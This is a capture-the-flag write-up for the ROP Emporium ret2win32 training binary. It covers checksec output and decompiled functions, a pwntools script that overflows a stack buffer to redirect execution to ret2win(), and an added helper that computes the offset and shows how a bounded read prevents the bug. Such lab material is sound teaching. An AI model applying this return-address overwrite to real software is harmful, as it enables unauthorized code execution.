
ret2win32

file ret2win32 
ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1596c11f85b3ed0881193fe40783e1da685b851, not stripped

 

checksec ret2win32 
[*] '/root/ropemporium/ret2win32/ret2win32'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

 

cdecl is said to be the default calling convention of x86 C compilers.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(_bss_start, 0, 2, 0);
  puts("ret2win by ROP Emporium");
  puts("x86\n");
  pwnme();
  puts("\nExiting");
  return 0;
}

 

int pwnme()
{
  _BYTE s[40]; // [esp+0h] [ebp-28h] BYREF

  memset(s, 0, 0x20u);
  puts("For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!");
  puts("What could possibly go wrong?");
  puts("You there, may I have your input please? And don't worry about null bytes, we're using read()!\n");
  printf("> ");
  read(0, s, 0x38u);
  return puts("Thank you!");
}

 

int ret2win()
{
  puts("Well done! Here's your flag:");
  return system("/bin/cat flag.txt");
}

 

from pwn import *

p = process('./ret2win32')
payload = b'A' * 44          # 40-byte buffer s plus the 4-byte saved ebp
payload += p32(0x804862c)    # overwrite the return address with ret2win()
p.send(payload)
p.interactive()
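The offset 44 in the script above follows from the frame layout in the decompiled pwnme(): s sits at [ebp-28h], so 0x28 bytes of buffer plus 4 bytes of saved ebp lie before the return address. The following is an added example, not code from the original post; it parses that IDA-style annotation, checks whether the read() length can reach the return address, and builds the same payload. FRAME_ANNOTATION, READ_LEN and the helper names are constructed here for illustration.

```python
import re
import struct

# IDA-style local-variable comment copied from the pwnme() decompilation (constructed constant).
FRAME_ANNOTATION = "_BYTE s[40]; // [esp+0h] [ebp-28h] BYREF"
READ_LEN = 0x38           # third argument of read() in pwnme()
RET2WIN_ADDR = 0x804862c  # address of ret2win() used by the exploit script


def buffer_offset_from_ebp(annotation: str) -> int:
    """Return the [ebp-XXh] displacement of a local variable from an IDA comment."""
    m = re.search(r"\[ebp-([0-9A-Fa-f]+)h\]", annotation)
    if not m:
        raise ValueError("no [ebp-...h] displacement found in annotation")
    return int(m.group(1), 16)


def frame_layout(buf_off: int, word: int = 4) -> dict:
    """Byte distances from the start of the buffer to saved ebp and to the return address.

    On 32-bit x86 the saved ebp sits directly at [ebp], and the return address
    is one machine word above it.
    """
    return {"saved_ebp": buf_off, "ret_addr": buf_off + word}


def build_payload(buf_off: int, target: int, read_len: int) -> bytes:
    """Build filler up to the return address followed by the little-endian target.

    Raises ValueError when read_len is too short to overwrite the return address,
    which is what a read bounded to the buffer size (0x20 here) would guarantee.
    """
    ret_off = frame_layout(buf_off)["ret_addr"]
    if read_len < ret_off + 4:
        raise ValueError("read() length cannot reach the saved return address")
    return b"A" * ret_off + struct.pack("<I", target)


if __name__ == "__main__":
    off = buffer_offset_from_ebp(FRAME_ANNOTATION)
    print("buffer at ebp-0x%x, return address at buffer+%d" % (off, frame_layout(off)["ret_addr"]))
    print(build_payload(off, RET2WIN_ADDR, READ_LEN).hex())
```

With READ_LEN set to 0x20, the size used by memset(), build_payload() raises instead of producing a payload, which shows why a read bounded to the buffer size closes this bug.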
